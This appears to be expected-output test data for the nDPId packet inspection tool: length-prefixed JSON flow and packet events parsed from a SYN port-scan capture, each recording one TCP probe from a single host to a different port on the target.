+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/dIAACcGI6CsEAAIQA2GNIzTDvPdU4MZAAAAAGACEAAZmQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs8f8AACcGL3OsEAAIQA2GNIzTFf\/dU4MZAAAAAGACEAASjQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsf98AADQGlJOsEAAIQA2GNIzTB9HdU4MZAAAAAGACBAAsuwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs4wcAACgGPWusEAAIQA2GNIzTPoHdU4MZAAAAAGACBAD2CgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsxOgAACoGWYqsEAAIQA2GNIzTECHdU4MZAAAAAGACDAAcawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsfUMAAC0Gni+sEAAIQA2GNIzTCvvdU4MZAAAAAGACCAAlkQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsdR4AACkGqlSsEAAIQA2GNIzTDZTdU4MZAAAAAGACCAAi+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs2GAAACkGRxKsEAAIQA2GNIzTB\/7dU4MZAAAAAGACCAAojgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAse2wAADEGnAasEAAIQA2GNIzTCdrdU4MZAAAAAGACCAAmsgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsoZYAADAGdtysEAAIQA2GNIzTBCTdU4MZAAAAAGACBAAwaAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsB5YAACkGF92sEAAIQA2GNIzTBBfdU4MZAAAAAGACCAAsdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsekUAAC8Gny2sEAAIQA2GNIzTH5bdU4MZAAAAAGACEAAI9gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsvlsAAC0GXResEAAIQA2GNIzTBILdU4MZAAAAAGACCAAsCgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsLE8AACYG9iOsEAAIQA2GNIzTBfTdU4MZAAAAAGACDAAmmAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs4LEAADcGMMGsEAAIQA2GNIzTBoLdU4MZAAAAAGACEAAiCgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsgKkAACgGn8msEAAIQA2GNIzTBD\/dU4MZAAAAAGACBAAwTQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsqWEAADIGbRGsEAAIQA2GNIzTHnjdU4MZAAAAAGACDAAOFAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsfMoAACYGpaisEAAIQA2GNIzTTUTdU4MZAAAAAGACDADfRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs+oEAACwGIfGsEAAIQA2GNIzTEA\/dU4MZAAAAAGACBAAkfQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsn\/4AACkGf3SsEAAIQA2GNIzTatzdU4MZAAAAAGACCADFrwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs32IAADoGLxCsEAAIQA2GNIzTFUDdU4MZAAAAAGACDAAXTAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAswOYAAC0GWoysEAAIQA2GNIzTAGPdU4MZAAAAAGACCAAwKQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAspGsAACYGfgesEAAIQA2GNIzTBBDdU4MZAAAAAGACDAAofAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs6bIAACsGM8CsEAAIQA2GNIzTFqjdU4MZAAAAAGACEAAR5AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 